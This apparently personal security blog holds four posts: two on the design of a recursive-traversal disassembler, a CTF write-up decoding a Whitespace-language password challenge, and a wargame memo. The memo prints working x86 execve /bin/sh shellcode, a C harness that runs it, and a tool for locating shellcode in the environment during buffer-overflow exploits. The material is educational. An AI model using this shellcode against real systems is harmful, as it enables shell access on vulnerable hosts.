Friday, September 6, 2013

Standing the recursive traversal algorithms: towards a software architecture

Update 07/09/2013: there is now a github repo for the experimentation: https://github.com/Ge0/RecursiveTraversalx86 and I'll try to fill it as much as I can. If you want to get involved in, feel free to drop a comment or shoot me an email. Thx!

This article follows next to the Thougts about disassembling algorithms one. If you haven't read it yet then I strongly suggest you to do so, otherwise you wouldn't find any interest in the following lines.

After having gathered tips and tricks about the guidelines of the algorithms, one another interesting approach would be thinking about a modular software architecture that could properly encapsulate our algorithms, thus preparing the field for further features as:
  • disassembling other instruction sets;
  • interchanging mnemonics syntaxes;
  • embedding the algorithms into pieces of software;
  • and so on...
One widely known tool that help one thinking about software architecture is UML. Despite it is not especially appreciated by many, I found it quite useful regardless of the tiny features I could have used (example: caring about method's and attribute's scope, being accurate with the attributes within a classe, etc.). I actually just wanted to have an accurate representation of what I am supposed to do.

But let's not fall into an unterminable and boring speech and instead let's dig into our architecture.

Abstract representation of instructions

May I recall you that I came up with four kinds of instructions, which respectively are normal, referencing, flow and hijackflow.

First and foremost, we must think about one point: what do these types have in common? One obvious property that I came up with is the total size. By saying this, I mean the size of the eventual prefix plus the size of the opcode(s) plus the size of the operands. In a nutshell, it is the size of the stream of bytes we disassembled to build one single instruction.

A referencing instruction is an instruction that, once having been decoded, appears to deal with any memory address. It can either fetch data stored at this address or jump to it; there's actually many possibilities. Just keep in mind that it has a memory address to do something with.

Starting from this statement, therefore we may establish that both flow instruction's type and hijacking flow instruction's type are referencing instructions as well.

Last but not least, it is obvious to say that an hijacking flow instruction is a flow instruction, in addition of hijacking the execution flow (unconditional jump, ret, etc.).

We have a kind of beautiful inheritance so far. HijackFlowInstruction IS A FlowInstruction, FlowInstruction IS A ReferencingInstruction, and ReferencingInstruction IS AN Instruction.

The figure 1 sum things up with an UML diagram, showing the inheritance of the classes.

 Figure 1 - Inheritance among the instruction types

Thanks to such a data structure, our algorithm could rely on different behaviours according to what type of instruction it disassembles. But that is not enough. We have to focus on binary blocks because they are an important part of recursive traversal algorithms. They consists of a template that defines what must be code and what must be data.

Binary Blocks: showing the way we rule

Do you remember the Figure 2 of the previous article? It showed what we want to do with a binary region.

 A binary block is made of a reference address and the size it covers. We won't hold the content since we don't need it, moreover it would cost a lot of memory.

As we do want to distinguish code from data (how many times shall I repeat it?!) we can assume we have at least two respective kinds of blocs:

  • Code blocks: these blocks will handle binary code that is meant to be disassembled with the linear sweep algorithm;
  •  Data blocks: these blocks will handle data.
With respect to the code blocks: I talked about those ones in the previous article, saying they did not fit to our needs, but since we know that we have code and only code from an address to another one, this algorithm is suitable then.

Another probable issue regarding the code blocks would be the following one: assume you are disassembling instructions in a sequential way, registering referenced memory addresses that are likely to contain code. What if the reference address we've just computed points into an existing block? We won't disassemble the same code twice, but the instruction needs to reference another one with a label once we've procuded the final listing (I mean the source code). So we have to hold this address into the current code block. As a consequence, we will state that a code block as a list of symbols, which consists of the referenced instructions into the blocks.

Firstly, it avoids splitting a block, what could be a cumbersome operation; secondly, if the memory address points into the middle of a single instruction, then it would be considered as an invalid symbol and therefore it would result in a raw binary address in the listing, assuming that we don't know how to handle it, but we would still have a source code that produces exactly the same binary stream we've disassembled so far.

Let's focus on the data blocks now: there are many data sizes that we know, even more since we are low-level programmer. 1 byte (BYTE), 2 bytes (WORD), 4 bytes (DWORD), 8 bytes (QWORD).

For example, one would find it interesting that it could represent a DWORD instead of a stream of bytes, most especially if the piece of data is actually a binary address according to the context, etc. Therefore, sometimes, one line of:

DD 0xdeadbeef ; DD stands for Declare Double word

Would be more suitable than:

DB 0xef, 0xbe, 0xad, 0xde ; DB stands for Declare Byte

Thus our data block must handle the granularity of the data type it contains. Even though we won't especially end up with data blocks containing multiple words or dwords since we only deal with static memory addresses and don't perform symbolic execution, printing data into word or dword format would be interesting, especially if we encode, for example, a binary header into our assembly listing!

So does a data block needs to have a size attribute when it states that the pointed data is at least a word? At a first glance the answer is no, but I decided else and I will explain why.

Suppose you've previously reverse engineered the binary you want to disassemble. By any luck, you have identified valuable information that our algorithm couldn't have because it does not perform any single symbolic execution. For example, you may have spotted a callback that is dynamically computed, or a function pointers table somewhere into the memory.

One could enjoy providing the algorithms with information he has found. Actually it's already the case: you provide the entry point, but what if you could provide other information like "there's code at this address, and exactly 8 QWORDS at that address"? This could help ending up with a listing as clear as possible.

That is why we will hold the size into a word-block or a dword-block. The figure 2 shows a tiny UML diagram that summarizes what I tried to explain:

Figure 2 - Two types of blocks to handle a binary region

 You may notice there's a disass() method among the three classes and I should have told you about this sooner. It is a temporary solution to disassemble a binary block since we don't disassemble a code block the same way as we do for a data block. The polymorphism magic shall operate at this point, unless I eventually find out it does not fit to a flexible architecture. Maybe the Visitor pattern shall be applied in order to separate what can be changed (algorithms) from what should not be. We'll see later.

By navigating through every single binary block that has been produced by the algorithm as well as by the user, a binary region can easily be disassembled to produce accurate results.

What's next?

I'll try to keep releasing small articles like the first ones. I am currently thinking on releasing source code as well (still nothing, damn!) with a concrete experimentation on x86 by using the libdasm project. I also checked the libasm project out - which is part of the ERESI one. Choosing the most suitable library takes a bit of time and I will try to figure this out as quickly as possible.

So, next time, I'll try to show concrete stuff out, like disassembling a x86 binary region and producing a listing. If not, then you'd be at least given some examples of what I want to do (examples of inputs and outputs) in order to understand evermore the purpose of my project.

Thanks for having read this article, feel free to drop some feedback, regardless of it's english mistakes or if you have a better sight of my non mature software architecture. :)

Ge0

Sunday, August 18, 2013

Memo & tools for wargames

Here is a quick post acting as a self-reminder for how to successfully solve wargame levels when you meet buffer overflow vulnerabilities. This post may change in the future if I find anything useful to add.

Shellcode

Here is the one I always use:

\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0
\x0b\x52\x51\x53\x89\xe1\xcd\x80

Size: 28 bytes. You may seek better shellcode (more compact & with setuid support). Johnathan Salwan has made a great database accessible here: http://www.shell-storm.org/shellcode/


ge0@vlunbuntu:~$ echo -ne "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" > shellcode
ge0@vlunbuntu:~$ objdump -D --target binary -mi386 shellcode 
shellcode:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0: 31 c0                 xor    %eax,%eax
   2: 89 c2                 mov    %eax,%edx
   4: 50                    push   %eax
   5: 68 6e 2f 73 68        push   $0x68732f6e
   a: 68 2f 2f 62 69        push   $0x69622f2f
   f: 89 e3                 mov    %esp,%ebx
  11: 89 c1                 mov    %eax,%ecx
  13: b0 0b                 mov    $0xb,%al
  15: 52                    push   %edx
  16: 51                    push   %ecx
  17: 53                    push   %ebx
  18: 89 e1                 mov    %esp,%ecx
  1a: cd 80                 int    $0x80
ge0@vlunbuntu:~$ 


Test:


ge0@vlunbuntu:~$ cat testshellcode.c
const char* shellcode = 
"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89"
"\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";

int main() {
 void (*sh)() = (void(*)())shellcode;
 sh();
}
ge0@vlunbuntu:~$ gcc -o testshellcode testshellcode.c
ge0@vlunbuntu:~$ ./testshellcode 
$ whoami
ge0
$ exit
ge0@vlunbuntu:~$ 


Retrieving an environment variable's address

In case you put your shellcode in an environment variable, a tool may be useful in order to recover its address, given the variable name in addition of the target binary.


ge0@vlunbuntu:~/c$ cat getenv.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 char *ptr;

 if(argc < 3) {
  printf("Usage: %s <environment variable> <target name program>\n", argv[0]);
  exit(0);
 }
 ptr = getenv(argv[1]); /* get env var location */
 ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
 printf("%s will be at %p\n", argv[1], ptr);

 return 0;
}
ge0@vlunbuntu:~/c$ gcc -o getenv getenv.c
ge0@vlunbuntu:~/c$ ./getenv
Usage: ./getenv <environment variable> <target name program>
ge0@vlunbuntu:~/c$ export SHELLCODE=`echo -ne "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"`
ge0@vlunbuntu:~/c$ echo $SHELLCODE
1���Phn/shh//bi�����
                    RQS��̀
ge0@vlunbuntu:~/c$ ./getenv SHELLCODE ARandomBinaryToExploit
SHELLCODE will be at 0xbf8355b0
ge0@vlunbuntu:~/c$


And if you want to get things done quickly:


ge0@vlunbuntu:~/c$ wget http://geoffrey.royer.free.fr/ge0/blog/memo_wargame/getenv.c 2> /dev/null
ge0@vlunbuntu:~/c$ gcc -o getenv getenv.c


Please find all the interesting files there: http://geoffrey.royer.free.fr/ge0/blog/memo_wargame

Enjoy & happy hacking!

Ge0

Thursday, August 8, 2013

Thoughts about disassembling algorithms

A few days ago, I was thinking about an old project that I have been thinking about for over two years now. I did not especially work on it, since I had a lack of motivation and skill.

Recently I came up with the idea that if I started softly then I could perform to do something valuable. So this article will focus on a problem that is part of my project: disassembling algorithms.

If you have a bit of acquaintance with the topic, then you should know at least there are two main algorithms used in order to disassemble binary code:
  • Linear Sweep: the most simple algorithm, since it takes a region and disassemble it sequentially, converting each byte it founds to an instruction, regardless of wether it really is an instruction or simply some data.
  • Recursive Traversal: one more complex algorithm that consists in emulating the code, thus disassembling portions referenced by other instructions like (un)conditional jumps for example. One can distinguish code from data thanks to such an algorithm.
Therefore you may doubt that this post will focus on the last algorithm, because it is a bit more complicated that the first one. Moreover, you may found it in many known pieces of software, such as OllyDbg or, most commonly, IDA. There are also opensource tools that implement this algorithm, like the miasm framework.

There are several questions that might come up to your mind when you think about such an algorithm. For example, in intel x86 assembly language, given a region of code that is aimed to be disassembled for readability purpose, how would the algorithm behave when it reaches a conditional jump? What about an unconditional one? Do not forget the call & ret instructions as well!

When you meet such an instruction that references another memory address that is meant to be executed according to your context (I mean, register's values and flag's), you have to perform an analysis over it, even though you still have to disassemble further instructions at the current address if it's a conditional jump or a call.

In a nutshell, I came up with a hierarchy that structures the different kind of instructions that would help us perform Recursive Traversal algorithm:

  • Normal instruction: nothing to say about it, such instructions do not deal with direct memory references (exemple: xor eax, eax; mov eax,5 ; mov eax, [edx+4], etc.);
  •  Referencing instruction: contrary to a normal instruction, this one deals with direct memory address. It can be a branching instruction (call 0xdeadbeef) as an instruction that loads a value from an address (mov esi, [0xdeadbeef]). The last one could help us assuming that there is data at the given address, not code;
  • Flow instruction: it is a referencing instruction that is likely to alter the program counter: jumps, calls, etc. So the referenced memory address obviously contains code;
  • Hijack Flow instruction: I actually didn't find any best suitable term since English is not my first language, but I'm willing to think that it could be understandable: this last category covers unconditional jumps and ret instructions, since the next opcodes, if any, aren't especially meant to be executed.
 With such instruction types, it is fairly possible to disassemble binary code - no matter from what instruction set they come from - with the recursive traversal algorithm. Indeed, you can assign a custom behavior to each instruction's category and record memory addresses to disassemble / reference in your region.

As we said earlier regarding this algorithm, the main goal is to distinguish code from data. By tracing through the code, we will be able to record much information.

the miasm framework identifies the execution flow by identifying blocks of code and chaining them if there are branching instructions that tie them together. A block is made of a starting memory address and a length in bytes. Once you have these blocks into your memory region, you can assume that these will contain code and other non-referenced bytes would be data. This is not sufficient, but so far it is a good start. The figure 1 shows a diagram explaining how splitting code into memory regions could work.

Figure 1 - Splitting a code region into binary blocks

In this example, written in pseudo-code, we can see that there are a jmp $+3 instruction, meaning in our case "jumps 3 instructions farther" (whereas, in the intel instruction set, it means "jumps 3 bytes farther"). The instruction referenced by our jump would be "push 0x03". The other instructions "xor eax, eax" and "mov eax, 0xdeadbeef" are bypassed, thus not being referenced by any "binary block". It actually doesn't matter because there is no reason to execute this chunk of code.

To sum things up, still in our example, the first block goes from "push ebp" up to "jmp $+3", and contains 3 instructions (in a real case, the length would relate to the number of bytes, I guess you get it) and the second one goes from push 0x03 up to the last instruction - ret.

After having gathered all the information regarding the code blocks, it will be easy enough to disassemble code that is likely to be executed.

Now that we have a rough idea of what we could to, we could go on designing a simple flowchart explaining the Recursive Traversal algorithm. A few words to explain the steps...

We will maintain a stack of addresses to analyse, I mean, addresses that contain code, not data. The first address that will be pushed on to the stack will be the address of the program's entry point.

Then we enter a loop, popping the address at the top of the stack. Before disassembling the opcodes to get the desired instruction, several checks are performed. Indeed! Have we successfully popped an address? Is the address at the end of the memory region, meaning that there's not any opcode left to disassemble? That's the point!

If there are enough remaining opcodes, then we disassemble them, calculating the current instruction's length and memorizing it into a total sum. The total sum actually aims to be the block's length.

Things become interesting when we have a flow instruction (see the categories I suggested you above). If it is the case, then we have to push the target address into the stack for further disassembling if this address has not been analyzed yet (referenced by any existing block). And given the fact that it instruction hijacks the current flow (unconditional jump / ret) or not, we save the current binary block we are feeding and start a new one.

Since pictures are much more worthy than a long speech, let me show you the figure 2. It simply consists in the algorithm I just explained.


Figure 2 - Experimental Recursive Traversal flow chart

I'm willing to think that there are much better algorithms that mine. I actually didn't dig enough into smiasm code despite it is the only concrete example I have, but this article aimed to explain some way to understand how such an algorithm would work.

This could be the cornerstone for many projects, like a Reverse Engineering tool, simple disassembler or behaviour analyser. The ideas are not missing, just time!

Thanks for having read.

Ge0

References:
Miasm - Reverse Engineering framework - http://code.google.com/p/miasm
Binary Disassembly Block Coverage by Symbolic Execution vs. Recursive Descent - http://www.reddit.com/r/ReverseEngineering/comments/16tmpu/binary_disassembly_block_coverage_by_symbolic/
The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler - http://www.amazon.com/The-Ida-Pro-Book-Disassembler/dp/1593272898

Sunday, March 17, 2013

ForbiddenBits Ctf WriteUp - Invisible

Hi Folks,

I tried to run the ForbiddenBits Ctf on my own during this week-end, and despite my lack of motivation I managed to perform one of the several given challenges; it's called "invisible".

We are given a URL that points to... A blank page. Not that blank. Viewing the source code & typing ctrl+a informs us that the page actually contains spaces and tabulations.

You can find the content at http://geoffrey.royer.free.fr/ge0/blog/forbiddenbits_writeup_invisible/file.txt

I therefore remembered of a programming language called WhiteSpace and I felt lucky at this time! All we have to do is to download a whitespace interpreter / debugger to run the script. You can find one at http://www.burghard.info/Code/Whitespace/index.html. I have compiled the program for the Windows platform here: http://geoffrey.royer.free.fr/ge0/blog/forbiddenbits_writeup_invisible/inter.exe

Compiling the program & launching it with our whitespace script directly spawns an invisible; the challenge's actually not over and we are asked for a password to input. And if our password goes wrong, we are told so.

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
pass
wrong

Since I am not a WhiteSpace hacker, I decide to run the script with the debug option.

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt -d
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
1 push 119
2 push 0
3 inc

There aree three instructions that "pushes" values. Probably onto a stack? But it's not such a big deal; by instinct I decide to find out what the 119 means. Its ASCII values corresponds to 'w'. Typing a w and pressing enter make me run through more code.

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt -d
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
1 push 119
2 push 0
3 inc
w
4 push 0
5 retrive
6 sub
7 jumpz 325
9 label 325
10 push 115
11 push 0
12 inc
13 push 0
14 retrive
15 sub
16 jumpz 327
17 jump 323
129 label 323
130 push 119
131 outc
w132 push 114
133 outc
r134 push 111
135 outc
o136 push 110
137 outc
n138 push 103
139 outc
g140 exit

Looks like the more good characters you have, the more you can find the other ones. We can see the "push 115" instruction after a kind of conditionnal jump. The 155 value finds its pair as 's' into the ASCII table. By repeating such a procedure we can find the pass: "wslang".

C:\Users\Geoffrey\Documents\ForbiddenBits\WhiteSpace\pack\Debug>inter file.txt
WhiteSpace interpreter in C++ (speedy!!)
Made by Oliver Burghard Smarty21@gmx.net
in his free time for your and his joy
good time and join me to get Whitespace ready for business
For any other information dial 1-900-WHITESPACE
Or get soon info at www.WHITESPACE-WANTS-TO-BE-TAKEN-SERIOUS.org
-- WS Interpreter C++ ------------------------------------------
wslang
The key is We_are_Nasus

Funny challenge, pretty straightforward, not that time-consuming if you already know what WhiteSpace is. Otherwise you've been given another (useless :P) knowledge. It was my unique write-up of this ctf. I am a wanker and I know it. See you guys! :))

Ge0

Sources:

ForbiddenBits - http://forbiddenbits.net/
WhiteSpace language - http://en.wikipedia.org/wiki/Whitespace_%28programming_language%29